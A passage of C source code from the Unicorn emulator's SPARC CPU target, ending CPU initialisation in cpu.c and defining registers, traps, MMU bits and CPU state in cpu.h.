0x000000ff, .mmu_sfsr_mask = 0xffffffff, .mmu_trcr_mask = 0xffffffff, .nwindows = 8, .features = CPU_DEFAULT_FEATURES | CPU_FEATURE_TA0_SHUTDOWN | CPU_FEATURE_ASR17 | CPU_FEATURE_CACHE_CTRL | CPU_FEATURE_POWERDOWN | CPU_FEATURE_CASA, }, #endif }; static void sparc_cpu_set_pc(CPUState *cs, vaddr value) { SPARCCPU *cpu = SPARC_CPU(cs); cpu->env.pc = value; cpu->env.npc = value + 4; } static void sparc_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { SPARCCPU *cpu = SPARC_CPU(cs); cpu->env.pc = tb->pc; cpu->env.npc = tb->cs_base; } static bool sparc_cpu_has_work(CPUState *cs) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; return (cs->interrupt_request & CPU_INTERRUPT_HARD) && cpu_interrupts_enabled(env); } static void sparc_cpu_realizefn(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); SPARCCPU *cpu = SPARC_CPU(dev); CPUSPARCState *env = &cpu->env; env->version = env->def.iu_version; env->fsr = env->def.fpu_version; env->nwindows = env->def.nwindows; #if !defined(TARGET_SPARC64) env->mmuregs[0] |= env->def.mmu_version; cpu_sparc_set_id(env, 0); env->mxccregs[7] |= env->def.mxcc_version; #else env->mmu_version = env->def.mmu_version; env->maxtl = env->def.maxtl; env->version |= env->def.maxtl << 8; env->version |= env->def.nwindows - 1; #endif cpu_exec_realizefn(cs); } 
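/*
 * Editorial note (not part of the original file): uc->cpu_model, consumed
 * by cpu_sparc_init() below as an index into sparc_defs[], is what the
 * host-side Unicorn API selects before emulation starts. A minimal
 * sketch, assuming the public <unicorn/unicorn.h> interface:
 *
 *     uc_engine *uc;
 *     uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32 | UC_MODE_BIG_ENDIAN, &uc);
 *     uc_ctl_set_cpu_model(uc, UC_CPU_SPARC32_LEON3);
 *     // ... map memory, write code, uc_emu_start(), uc_close() ...
 */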
static void sparc_cpu_initfn(struct uc_struct *uc, CPUState *obj)
{
    SPARCCPU *cpu = SPARC_CPU(obj);
    SPARCCPUClass *scc = SPARC_CPU_GET_CLASS(obj);
    CPUSPARCState *env = &cpu->env;

    env->uc = uc;

    cpu_set_cpustate_pointers(cpu);

    if (scc->cpu_def) {
        env->def = *scc->cpu_def;
    }
}

static void sparc_cpu_class_init(struct uc_struct *uc, CPUClass *oc)
{
    SPARCCPUClass *scc = SPARC_CPU_CLASS(oc);
    CPUClass *cc = CPU_CLASS(oc);

    /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */
    scc->parent_reset = cc->reset;
    /* overwrite CPUClass->reset with the arch reset: sparc_cpu_reset(). */
    cc->reset = sparc_cpu_reset;

    cc->has_work = sparc_cpu_has_work;
    cc->do_interrupt = sparc_cpu_do_interrupt;
    cc->cpu_exec_interrupt = sparc_cpu_exec_interrupt;
    cc->set_pc = sparc_cpu_set_pc;
    cc->synchronize_from_tb = sparc_cpu_synchronize_from_tb;
    cc->tlb_fill_cpu = sparc_cpu_tlb_fill;
    cc->do_unaligned_access = sparc_cpu_do_unaligned_access;
    cc->get_phys_page_debug = sparc_cpu_get_phys_page_debug;
    cc->tcg_initialize = sparc_tcg_init;
}

SPARCCPU *cpu_sparc_init(struct uc_struct *uc)
{
    SPARCCPU *cpu;
    CPUState *cs;
    CPUClass *cc;
    SPARCCPUClass *scc;

    cpu = malloc(sizeof(*cpu));
    if (cpu == NULL) {
        return NULL;
    }
    memset(cpu, 0, sizeof(*cpu));

    if (uc->cpu_model == INT_MAX) {
#ifdef TARGET_SPARC64
        uc->cpu_model = UC_CPU_SPARC64_SUN_ULTRASPARC_IV; // Sun UltraSparc IV
#else
        uc->cpu_model = UC_CPU_SPARC32_LEON3; // Leon 3
#endif
    } else if (uc->cpu_model >= ARRAY_SIZE(sparc_defs)) {
        free(cpu);
        return NULL;
    }

    cs = (CPUState *)cpu;
    cc = (CPUClass *)&cpu->cc;
    cs->cc = cc;
    cs->uc = uc;
    uc->cpu = cs;

    /* init CPUClass */
    cpu_class_init(uc, cc);
    /* init SPARCCPUClass */
    sparc_cpu_class_init(uc, cc);
    /* init CPUState */
    cpu_common_initfn(uc, cs);
    /* init SPARC types scc->def */
    scc = SPARC_CPU_CLASS(cc);
    scc->cpu_def = &sparc_defs[uc->cpu_model];
    /* init SPARCCPU */
    sparc_cpu_initfn(uc, cs);
    /* realize SPARCCPU */
    sparc_cpu_realizefn(uc, cs);
    /* realize CPUState */

    // init address space
    cpu_address_space_init(cs, 0, cs->memory);

    qemu_init_vcpu(cs);

    return cpu;
}

unicorn-2.1.1/qemu/target/sparc/cpu.h

#ifndef SPARC_CPU_H
#define SPARC_CPU_H

#include "qemu/bswap.h"
#include "cpu-qom.h"
#include "exec/cpu-defs.h"

#if !defined(TARGET_SPARC64)
#define TARGET_DPREGS 16
#else
#define TARGET_DPREGS 32
#endif

/*#define EXCP_INTERRUPT 0x100*/

/* Windowed register indexes.
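 * %o0..%o7 come first, then %l0..%l7, then %i0..%i7; WREG_SP and WREG_FP
 * below are aliases for %o6 and %i6. These index the 24 registers visible
 * through env->regwptr, which advances by 16 per window (see
 * sparc_cpu_reset() above), so adjacent windows share their %i/%o octet.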
*/ enum { WREG_O0, WREG_O1, WREG_O2, WREG_O3, WREG_O4, WREG_O5, WREG_O6, WREG_O7, WREG_L0, WREG_L1, WREG_L2, WREG_L3, WREG_L4, WREG_L5, WREG_L6, WREG_L7, WREG_I0, WREG_I1, WREG_I2, WREG_I3, WREG_I4, WREG_I5, WREG_I6, WREG_I7, WREG_SP = WREG_O6, WREG_FP = WREG_I6, }; /* trap definitions */ #ifndef TARGET_SPARC64 #define TT_TFAULT 0x01 #define TT_ILL_INSN 0x02 #define TT_PRIV_INSN 0x03 #define TT_NFPU_INSN 0x04 #define TT_WIN_OVF 0x05 #define TT_WIN_UNF 0x06 #define TT_UNALIGNED 0x07 #define TT_FP_EXCP 0x08 #define TT_DFAULT 0x09 #define TT_TOVF 0x0a #define TT_EXTINT 0x10 #define TT_CODE_ACCESS 0x21 #define TT_UNIMP_FLUSH 0x25 #define TT_DATA_ACCESS 0x29 #define TT_DIV_ZERO 0x2a #define TT_NCP_INSN 0x24 #define TT_TRAP 0x80 #else #define TT_POWER_ON_RESET 0x01 #define TT_TFAULT 0x08 #define TT_CODE_ACCESS 0x0a #define TT_ILL_INSN 0x10 #define TT_UNIMP_FLUSH TT_ILL_INSN #define TT_PRIV_INSN 0x11 #define TT_NFPU_INSN 0x20 #define TT_FP_EXCP 0x21 #define TT_TOVF 0x23 #define TT_CLRWIN 0x24 #define TT_DIV_ZERO 0x28 #define TT_DFAULT 0x30 #define TT_DATA_ACCESS 0x32 #define TT_UNALIGNED 0x34 #define TT_PRIV_ACT 0x37 #define TT_INSN_REAL_TRANSLATION_MISS 0x3e #define TT_DATA_REAL_TRANSLATION_MISS 0x3f #define TT_EXTINT 0x40 #define TT_IVEC 0x60 #define TT_TMISS 0x64 #define TT_DMISS 0x68 #define TT_DPROT 0x6c #define TT_SPILL 0x80 #define TT_FILL 0xc0 #define TT_WOTHER (1 << 5) #define TT_TRAP 0x100 #define TT_HTRAP 0x180 #endif #define PSR_NEG_SHIFT 23 #define PSR_NEG (1 << PSR_NEG_SHIFT) #define PSR_ZERO_SHIFT 22 #define PSR_ZERO (1 << PSR_ZERO_SHIFT) #define PSR_OVF_SHIFT 21 #define PSR_OVF (1 << PSR_OVF_SHIFT) #define PSR_CARRY_SHIFT 20 #define PSR_CARRY (1 << PSR_CARRY_SHIFT) #define PSR_ICC (PSR_NEG|PSR_ZERO|PSR_OVF|PSR_CARRY) #if !defined(TARGET_SPARC64) #define PSR_EF (1<<12) #define PSR_PIL 0xf00 #define PSR_S (1<<7) #define PSR_PS (1<<6) #define PSR_ET (1<<5) #define PSR_CWP 0x1f #endif #define CC_SRC (env->cc_src) #define CC_SRC2 (env->cc_src2) #define CC_DST (env->cc_dst) #define CC_OP (env->cc_op) /* Even though lazy evaluation of CPU condition codes tends to be less * important on RISC systems where condition codes are only updated * when explicitly requested, SPARC uses it to update 32-bit and 64-bit * condition codes. */ enum { CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ CC_OP_FLAGS, /* all cc are back in status register */ CC_OP_DIV, /* modify N, Z and V, C = 0*/ CC_OP_ADD, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_ADDX, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_TADD, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_TADDTV, /* modify all flags except V, CC_DST = res, CC_SRC = src1 */ CC_OP_SUB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_SUBX, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_TSUB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_TSUBTV, /* modify all flags except V, CC_DST = res, CC_SRC = src1 */ CC_OP_LOGIC, /* modify N and Z, C = V = 0, CC_DST = res */ CC_OP_NB, }; /* Trap base register */ #define TBR_BASE_MASK 0xfffff000 #if defined(TARGET_SPARC64) #define PS_TCT (1<<12) /* UA2007, impl.dep. 
trap on control transfer */ #define PS_IG (1<<11) /* v9, zero on UA2007 */ #define PS_MG (1<<10) /* v9, zero on UA2007 */ #define PS_CLE (1<<9) /* UA2007 */ #define PS_TLE (1<<8) /* UA2007 */ #define PS_RMO (1<<7) #define PS_RED (1<<5) /* v9, zero on UA2007 */ #define PS_PEF (1<<4) /* enable fpu */ #define PS_AM (1<<3) /* address mask */ #define PS_PRIV (1<<2) #define PS_IE (1<<1) #define PS_AG (1<<0) /* v9, zero on UA2007 */ #define FPRS_FEF (1<<2) #define HS_PRIV (1<<2) #endif /* Fcc */ #define FSR_RD1 (1ULL << 31) #define FSR_RD0 (1ULL << 30) #define FSR_RD_MASK (FSR_RD1 | FSR_RD0) #define FSR_RD_NEAREST 0 #define FSR_RD_ZERO FSR_RD0 #define FSR_RD_POS FSR_RD1 #define FSR_RD_NEG (FSR_RD1 | FSR_RD0) #define FSR_NVM (1ULL << 27) #define FSR_OFM (1ULL << 26) #define FSR_UFM (1ULL << 25) #define FSR_DZM (1ULL << 24) #define FSR_NXM (1ULL << 23) #define FSR_TEM_MASK (FSR_NVM | FSR_OFM | FSR_UFM | FSR_DZM | FSR_NXM) #define FSR_NVA (1ULL << 9) #define FSR_OFA (1ULL << 8) #define FSR_UFA (1ULL << 7) #define FSR_DZA (1ULL << 6) #define FSR_NXA (1ULL << 5) #define FSR_AEXC_MASK (FSR_NVA | FSR_OFA | FSR_UFA | FSR_DZA | FSR_NXA) #define FSR_NVC (1ULL << 4) #define FSR_OFC (1ULL << 3) #define FSR_UFC (1ULL << 2) #define FSR_DZC (1ULL << 1) #define FSR_NXC (1ULL << 0) #define FSR_CEXC_MASK (FSR_NVC | FSR_OFC | FSR_UFC | FSR_DZC | FSR_NXC) #define FSR_FTT2 (1ULL << 16) #define FSR_FTT1 (1ULL << 15) #define FSR_FTT0 (1ULL << 14) //gcc warns about constant overflow for ~FSR_FTT_MASK //#define FSR_FTT_MASK (FSR_FTT2 | FSR_FTT1 | FSR_FTT0) #ifdef TARGET_SPARC64 #define FSR_FTT_NMASK 0xfffffffffffe3fffULL #define FSR_FTT_CEXC_NMASK 0xfffffffffffe3fe0ULL #define FSR_LDFSR_OLDMASK 0x0000003f000fc000ULL #define FSR_LDXFSR_MASK 0x0000003fcfc00fffULL #define FSR_LDXFSR_OLDMASK 0x00000000000fc000ULL #else #define FSR_FTT_NMASK 0xfffe3fffULL #define FSR_FTT_CEXC_NMASK 0xfffe3fe0ULL #define FSR_LDFSR_OLDMASK 0x000fc000ULL #endif #define FSR_LDFSR_MASK 0xcfc00fffULL #define FSR_FTT_IEEE_EXCP (1ULL << 14) #define FSR_FTT_UNIMPFPOP (3ULL << 14) #define FSR_FTT_SEQ_ERROR (4ULL << 14) #define FSR_FTT_INVAL_FPR (6ULL << 14) #define FSR_FCC1_SHIFT 11 #define FSR_FCC1 (1ULL << FSR_FCC1_SHIFT) #define FSR_FCC0_SHIFT 10 #define FSR_FCC0 (1ULL << FSR_FCC0_SHIFT) /* MMU */ #define MMU_E (1<<0) #define MMU_NF (1<<1) #define PTE_ENTRYTYPE_MASK 3 #define PTE_ACCESS_MASK 0x1c #define PTE_ACCESS_SHIFT 2 #define PTE_PPN_SHIFT 7 #define PTE_ADDR_MASK 0xffffff00 #define PG_ACCESSED_BIT 5 #define PG_MODIFIED_BIT 6 #define PG_CACHE_BIT 7 #define PG_ACCESSED_MASK (1 << PG_ACCESSED_BIT) #define PG_MODIFIED_MASK (1 << PG_MODIFIED_BIT) #define PG_CACHE_MASK (1 << PG_CACHE_BIT) /* 3 <= NWINDOWS <= 32. 
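 * (The realize hook copies def.nwindows into env->nwindows and, on
 * sparc64, also encodes nwindows - 1 into the low bits of env->version;
 * see sparc_cpu_realizefn() in cpu.c.)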
*/ #define MIN_NWINDOWS 3 #define MAX_NWINDOWS 32 #ifdef TARGET_SPARC64 typedef struct trap_state { uint64_t tpc; uint64_t tnpc; uint64_t tstate; uint32_t tt; } trap_state; #endif #define TARGET_INSN_START_EXTRA_WORDS 1 struct sparc_def_t { const char *name; target_ulong iu_version; uint32_t fpu_version; uint32_t mmu_version; uint32_t mmu_bm; uint32_t mmu_ctpr_mask; uint32_t mmu_cxr_mask; uint32_t mmu_sfsr_mask; uint32_t mmu_trcr_mask; uint32_t mxcc_version; uint32_t features; uint32_t nwindows; uint32_t maxtl; }; #define CPU_FEATURE_FLOAT (1 << 0) #define CPU_FEATURE_FLOAT128 (1 << 1) #define CPU_FEATURE_SWAP (1 << 2) #define CPU_FEATURE_MUL (1 << 3) #define CPU_FEATURE_DIV (1 << 4) #define CPU_FEATURE_FLUSH (1 << 5) #define CPU_FEATURE_FSQRT (1 << 6) #define CPU_FEATURE_FMUL (1 << 7) #define CPU_FEATURE_VIS1 (1 << 8) #define CPU_FEATURE_VIS2 (1 << 9) #define CPU_FEATURE_FSMULD (1 << 10) #define CPU_FEATURE_HYPV (1 << 11) #define CPU_FEATURE_CMT (1 << 12) #define CPU_FEATURE_GL (1 << 13) #define CPU_FEATURE_TA0_SHUTDOWN (1 << 14) /* Shutdown on "ta 0x0" */ #define CPU_FEATURE_ASR17 (1 << 15) #define CPU_FEATURE_CACHE_CTRL (1 << 16) #define CPU_FEATURE_POWERDOWN (1 << 17) #define CPU_FEATURE_CASA (1 << 18) #ifndef TARGET_SPARC64 #define CPU_DEFAULT_FEATURES (CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | \ CPU_FEATURE_MUL | CPU_FEATURE_DIV | \ CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | \ CPU_FEATURE_FMUL | CPU_FEATURE_FSMULD) #else #define CPU_DEFAULT_FEATURES (CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | \ CPU_FEATURE_MUL | CPU_FEATURE_DIV | \ CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | \ CPU_FEATURE_FMUL | CPU_FEATURE_VIS1 | \ CPU_FEATURE_VIS2 | CPU_FEATURE_FSMULD | \ CPU_FEATURE_CASA) enum { mmu_us_12, // Ultrasparc < III (64 entry TLB) mmu_us_3, // Ultrasparc III (512 entry TLB) mmu_us_4, // Ultrasparc IV (several TLBs, 32 and 256MB pages) mmu_sun4v, // T1, T2 }; #endif #define TTE_VALID_BIT (1ULL << 63) #define TTE_NFO_BIT (1ULL << 60) #define TTE_IE_BIT (1ULL << 59) #define TTE_USED_BIT (1ULL << 41) #define TTE_LOCKED_BIT (1ULL << 6) #define TTE_SIDEEFFECT_BIT (1ULL << 3) #define TTE_PRIV_BIT (1ULL << 2) #define TTE_W_OK_BIT (1ULL << 1) #define TTE_GLOBAL_BIT (1ULL << 0) #define TTE_NFO_BIT_UA2005 (1ULL << 62) #define TTE_USED_BIT_UA2005 (1ULL << 47) #define TTE_LOCKED_BIT_UA2005 (1ULL << 61) #define TTE_SIDEEFFECT_BIT_UA2005 (1ULL << 11) #define TTE_PRIV_BIT_UA2005 (1ULL << 8) #define TTE_W_OK_BIT_UA2005 (1ULL << 6) #define TTE_IS_VALID(tte) ((tte) & TTE_VALID_BIT) #define TTE_IS_NFO(tte) ((tte) & TTE_NFO_BIT) #define TTE_IS_IE(tte) ((tte) & TTE_IE_BIT) #define TTE_IS_USED(tte) ((tte) & TTE_USED_BIT) #define TTE_IS_LOCKED(tte) ((tte) & TTE_LOCKED_BIT) #define TTE_IS_SIDEEFFECT(tte) ((tte) & TTE_SIDEEFFECT_BIT) #define TTE_IS_SIDEEFFECT_UA2005(tte) ((tte) & TTE_SIDEEFFECT_BIT_UA2005) #define TTE_IS_PRIV(tte) ((tte) & TTE_PRIV_BIT) #define TTE_IS_W_OK(tte) ((tte) & TTE_W_OK_BIT) #define TTE_IS_NFO_UA2005(tte) ((tte) & TTE_NFO_BIT_UA2005) #define TTE_IS_USED_UA2005(tte) ((tte) & TTE_USED_BIT_UA2005) #define TTE_IS_LOCKED_UA2005(tte) ((tte) & TTE_LOCKED_BIT_UA2005) #define TTE_IS_SIDEEFFECT_UA2005(tte) ((tte) & TTE_SIDEEFFECT_BIT_UA2005) #define TTE_IS_PRIV_UA2005(tte) ((tte) & TTE_PRIV_BIT_UA2005) #define TTE_IS_W_OK_UA2005(tte) ((tte) & TTE_W_OK_BIT_UA2005) #define TTE_IS_GLOBAL(tte) ((tte) & TTE_GLOBAL_BIT) #define TTE_SET_USED(tte) ((tte) |= TTE_USED_BIT) #define TTE_SET_UNUSED(tte) ((tte) &= ~TTE_USED_BIT) #define TTE_PGSIZE(tte) (((tte) >> 61) & 3ULL) #define TTE_PGSIZE_UA2005(tte) ((tte) & 7ULL) 
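/*
 * Editorial sketch (not in the original header): TTE_PGSIZE() above pulls
 * out the two sun4u page-size bits, so a byte-count helper could look like
 * the following, assuming the usual UltraSPARC encodings of 0 = 8K,
 * 1 = 64K, 2 = 512K, 3 = 4M (an assumption from the processor manuals,
 * not something this header states):
 *
 *     static inline uint64_t tte_page_bytes(uint64_t tte)
 *     {
 *         return 8192ULL << (3 * TTE_PGSIZE(tte));
 *     }
 */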
#define TTE_PA(tte) ((tte) & 0x1ffffffe000ULL) /* UltraSPARC T1 specific */ #define TLB_UST1_IS_REAL_BIT (1ULL << 9) /* Real translation entry */ #define TLB_UST1_IS_SUN4V_BIT (1ULL << 10) /* sun4u/sun4v TTE format switch */ #define SFSR_NF_BIT (1ULL << 24) /* JPS1 NoFault */ #define SFSR_TM_BIT (1ULL << 15) /* JPS1 TLB Miss */ #define SFSR_FT_VA_IMMU_BIT (1ULL << 13) /* USIIi VA out of range (IMMU) */ #define SFSR_FT_VA_DMMU_BIT (1ULL << 12) /* USIIi VA out of range (DMMU) */ #define SFSR_FT_NFO_BIT (1ULL << 11) /* NFO page access */ #define SFSR_FT_ILL_BIT (1ULL << 10) /* illegal LDA/STA ASI */ #define SFSR_FT_ATOMIC_BIT (1ULL << 9) /* atomic op on noncacheable area */ #define SFSR_FT_NF_E_BIT (1ULL << 8) /* NF access on side effect area */ #define SFSR_FT_PRIV_BIT (1ULL << 7) /* privilege violation */ #define SFSR_PR_BIT (1ULL << 3) /* privilege mode */ #define SFSR_WRITE_BIT (1ULL << 2) /* write access mode */ #define SFSR_OW_BIT (1ULL << 1) /* status overwritten */ #define SFSR_VALID_BIT (1ULL << 0) /* status valid */ #define SFSR_ASI_SHIFT 16 /* 23:16 ASI value */ #define SFSR_ASI_MASK (0xffULL << SFSR_ASI_SHIFT) #define SFSR_CT_PRIMARY (0ULL << 4) /* 5:4 context type */ #define SFSR_CT_SECONDARY (1ULL << 4) #define SFSR_CT_NUCLEUS (2ULL << 4) #define SFSR_CT_NOTRANS (3ULL << 4) #define SFSR_CT_MASK (3ULL << 4) /* Leon3 cache control */ /* Cache control: emulate the behavior of cache control registers but without any effect on the emulated */ #define CACHE_STATE_MASK 0x3 #define CACHE_DISABLED 0x0 #define CACHE_FROZEN 0x1 #define CACHE_ENABLED 0x3 /* Cache Control register fields */ #define CACHE_CTRL_IF (1 << 4) /* Instruction Cache Freeze on Interrupt */ #define CACHE_CTRL_DF (1 << 5) /* Data Cache Freeze on Interrupt */ #define CACHE_CTRL_DP (1 << 14) /* Data cache flush pending */ #define CACHE_CTRL_IP (1 << 15) /* Instruction cache flush pending */ #define CACHE_CTRL_IB (1 << 16) /* Instruction burst fetch */ #define CACHE_CTRL_FI (1 << 21) /* Flush Instruction cache (Write only) */ #define CACHE_CTRL_FD (1 << 22) /* Flush Data cache (Write only) */ #define CACHE_CTRL_DS (1 << 23) /* Data cache snoop enable */ #define CONVERT_BIT(X, SRC, DST) \ (SRC > DST ? 
(X) / (SRC / DST) & (DST) : ((X) & SRC) * (DST / SRC)) typedef struct SparcTLBEntry { uint64_t tag; uint64_t tte; } SparcTLBEntry; struct CPUTimer { const char *name; uint32_t frequency; uint32_t disabled; uint64_t disabled_mask; uint32_t npt; uint64_t npt_mask; int64_t clock_offset; QEMUTimer *qtimer; }; typedef struct CPUTimer CPUTimer; typedef struct CPUSPARCState CPUSPARCState; #if defined(TARGET_SPARC64) typedef union { uint64_t mmuregs[16]; struct { uint64_t tsb_tag_target; uint64_t mmu_primary_context; uint64_t mmu_secondary_context; uint64_t sfsr; uint64_t sfar; uint64_t tsb; uint64_t tag_access; uint64_t virtual_watchpoint; uint64_t physical_watchpoint; uint64_t sun4v_ctx_config[2]; uint64_t sun4v_tsb_pointers[4]; }; } SparcV9MMU; #endif struct CPUSPARCState { target_ulong gregs[8]; /* general registers */ target_ulong *regwptr; /* pointer to current register window */ target_ulong pc; /* program counter */ target_ulong npc; /* next program counter */ target_ulong y; /* multiply/divide register */ /* emulator internal flags handling */ target_ulong cc_src, cc_src2; target_ulong cc_dst; uint32_t cc_op; target_ulong cond; /* conditional branch result (XXX: save it in a temporary register when possible) */ uint32_t psr; /* processor state register */ target_ulong fsr; /* FPU state register */ CPU_DoubleU fpr[TARGET_DPREGS]; /* floating point registers */ uint32_t cwp; /* index of current register window (extracted from PSR) */ #if !defined(TARGET_SPARC64) || defined(TARGET_ABI32) uint32_t wim; /* window invalid mask */ #endif target_ulong tbr; /* trap base register */ #if !defined(TARGET_SPARC64) int psrs; /* supervisor mode (extracted from PSR) */ int psrps; /* previous supervisor mode */ int psret; /* enable traps */ #endif uint32_t psrpil; /* interrupt blocking level */ uint32_t pil_in; /* incoming interrupt level bitmap */ #if !defined(TARGET_SPARC64) int psref; /* enable fpu */ #endif int interrupt_index; /* NOTE: we allow 8 more registers to handle wrapping */ target_ulong regbase[MAX_NWINDOWS * 16 + 8]; /* Fields up to this point are cleared by a CPU reset */ #ifdef _MSC_VER int end_reset_fields; #else struct {} end_reset_fields; #endif /* Fields from here on are preserved across CPU reset. 
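 * (sparc_cpu_reset() clears everything before this point with a single
 * memset up to offsetof(CPUSPARCState, end_reset_fields), so member
 * ordering around this marker is load-bearing, not cosmetic.)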
*/ target_ulong version; uint32_t nwindows; /* MMU regs */ #if defined(TARGET_SPARC64) uint64_t lsu; #define DMMU_E 0x8 #define IMMU_E 0x4 SparcV9MMU immu; SparcV9MMU dmmu; SparcTLBEntry itlb[64]; SparcTLBEntry dtlb[64]; uint32_t mmu_version; #else uint32_t mmuregs[32]; uint64_t mxccdata[4]; uint64_t mxccregs[8]; uint32_t mmubpctrv, mmubpctrc, mmubpctrs; uint64_t mmubpaction; uint64_t mmubpregs[4]; uint64_t prom_addr; #endif /* temporary float registers */ float128 qt0, qt1; float_status fp_status; #if defined(TARGET_SPARC64) #define MAXTL_MAX 8 #define MAXTL_MASK (MAXTL_MAX - 1) trap_state ts[MAXTL_MAX]; uint32_t xcc; /* Extended integer condition codes */ uint32_t asi; uint32_t pstate; uint32_t tl; uint32_t maxtl; uint32_t cansave, canrestore, otherwin, wstate, cleanwin; uint64_t agregs[8]; /* alternate general registers */ uint64_t bgregs[8]; /* backup for normal global registers */ uint64_t igregs[8]; /* interrupt general registers */ uint64_t mgregs[8]; /* mmu general registers */ uint64_t glregs[8 * MAXTL_MAX]; uint64_t fprs; uint64_t tick_cmpr, stick_cmpr; CPUTimer *tick, *stick; #define TICK_NPT_MASK 0x8000000000000000ULL #define TICK_INT_DIS 0x8000000000000000ULL uint64_t gsr; uint32_t gl; // UA2005 /* UA 2005 hyperprivileged registers */ uint64_t hpstate, htstate[MAXTL_MAX], hintp, htba, hver, hstick_cmpr, ssr; uint64_t scratch[8]; CPUTimer *hstick; // UA 2005 /* Interrupt vector registers */ uint64_t ivec_status; uint64_t ivec_data[3]; uint32_t softint; #define SOFTINT_TIMER 1 #define SOFTINT_STIMER (1 << 16) #define SOFTINT_INTRMASK (0xFFFE) #define SOFTINT_REG_MASK (SOFTINT_STIMER|SOFTINT_INTRMASK|SOFTINT_TIMER) #endif sparc_def_t def; /* Leon3 cache control */ uint32_t cache_control; void *irq_manager; void (*qemu_irq_ack)(CPUSPARCState *env, void *irq_manager, int intno); // Unicorn engine struct uc_struct *uc; }; /** * SPARCCPU: * @env: #CPUSPARCState * * A SPARC CPU. 
*/ struct SPARCCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUSPARCState env; struct SPARCCPUClass cc; }; void sparc_cpu_do_interrupt(CPUState *cpu); hwaddr sparc_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void QEMU_NORETURN sparc_cpu_do_unaligned_access(CPUState *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); #ifdef _MSC_VER void cpu_raise_exception_ra(CPUSPARCState *, int, uintptr_t); #else void cpu_raise_exception_ra(CPUSPARCState *, int, uintptr_t) QEMU_NORETURN; #endif #ifndef NO_CPU_IO_DEFS /* cpu_init.c */ void cpu_sparc_set_id(CPUSPARCState *env, unsigned int cpu); void sparc_cpu_list(void); /* mmu_helper.c */ bool sparc_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); target_ulong mmu_probe(CPUSPARCState *env, target_ulong address, int mmulev); #if !defined(TARGET_SPARC64) int sparc_cpu_memory_rw_debug(CPUState *cpu, vaddr addr, uint8_t *buf, int len, bool is_write); #endif /* translate.c */ void sparc_tcg_init(struct uc_struct *uc); /* cpu-exec.c */ /* win_helper.c */ target_ulong cpu_get_psr(CPUSPARCState *env1); void cpu_put_psr(CPUSPARCState *env1, target_ulong val); void cpu_put_psr_raw(CPUSPARCState *env1, target_ulong val); #ifdef TARGET_SPARC64 target_ulong cpu_get_ccr(CPUSPARCState *env1); void cpu_put_ccr(CPUSPARCState *env1, target_ulong val); target_ulong cpu_get_cwp64(CPUSPARCState *env1); void cpu_put_cwp64(CPUSPARCState *env1, int cwp); void cpu_change_pstate(CPUSPARCState *env1, uint32_t new_pstate); void cpu_gl_switch_gregs(CPUSPARCState *env, uint32_t new_gl); #endif int cpu_cwp_inc(CPUSPARCState *env1, int cwp); int cpu_cwp_dec(CPUSPARCState *env1, int cwp); void cpu_set_cwp(CPUSPARCState *env1, int new_cwp); /* int_helper.c */ void leon3_irq_manager(CPUSPARCState *env, void *irq_manager, int intno); /* leon3.c */ // void leon3_irq_ack(void *irq_manager, int intno); #if defined (TARGET_SPARC64) static inline int compare_masked(uint64_t x, uint64_t y, uint64_t mask) { return (x & mask) == (y & mask); } #define MMU_CONTEXT_BITS 13 #define MMU_CONTEXT_MASK ((1 << MMU_CONTEXT_BITS) - 1) static inline int tlb_compare_context(const SparcTLBEntry *tlb, uint64_t context) { return compare_masked(context, tlb->tag, MMU_CONTEXT_MASK); } #endif #endif /* cpu-exec.c */ void sparc_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); #if defined(TARGET_SPARC64) hwaddr cpu_get_phys_page_nofault(CPUSPARCState *env, target_ulong addr, int mmu_idx); #endif int cpu_sparc_signal_handler(int host_signum, void *pinfo, void *puc); #define SPARC_CPU_TYPE_SUFFIX "-" TYPE_SPARC_CPU #define SPARC_CPU_TYPE_NAME(model) model SPARC_CPU_TYPE_SUFFIX #define CPU_RESOLVING_TYPE TYPE_SPARC_CPU #define cpu_signal_handler cpu_sparc_signal_handler #define cpu_list sparc_cpu_list /* MMU modes definitions */ #if defined (TARGET_SPARC64) #define MMU_USER_IDX 0 #define MMU_USER_SECONDARY_IDX 1 #define MMU_KERNEL_IDX 2 #define MMU_KERNEL_SECONDARY_IDX 3 #define MMU_NUCLEUS_IDX 4 #define MMU_PHYS_IDX 5 #else #define MMU_USER_IDX 0 #define MMU_KERNEL_IDX 1 #define MMU_PHYS_IDX 2 #endif #if defined (TARGET_SPARC64) static inline int cpu_has_hypervisor(CPUSPARCState *env1) { return env1->def.features & CPU_FEATURE_HYPV; } static inline int cpu_hypervisor_mode(CPUSPARCState *env1) { return cpu_has_hypervisor(env1) && 
(env1->hpstate & HS_PRIV);
}

static inline int cpu_supervisor_mode(CPUSPARCState *env1)
{
    return env1->pstate & PS_PRIV;
}
#else
static inline int cpu_supervisor_mode(CPUSPARCState *env1)
{
    return env1->psrs;
}
#endif

static inline int cpu_mmu_index(CPUSPARCState *env, bool ifetch)
{
#if !defined(TARGET_SPARC64)
    if ((env->mmuregs[0] & MMU_E) == 0) { /* MMU disabled */
        return MMU_PHYS_IDX;
    } else {
        return env->psrs;
    }
#else
    /* IMMU or DMMU disabled. */
    if (ifetch
        ? (env->lsu & IMMU_E) == 0 || (env->pstate & PS_RED) != 0
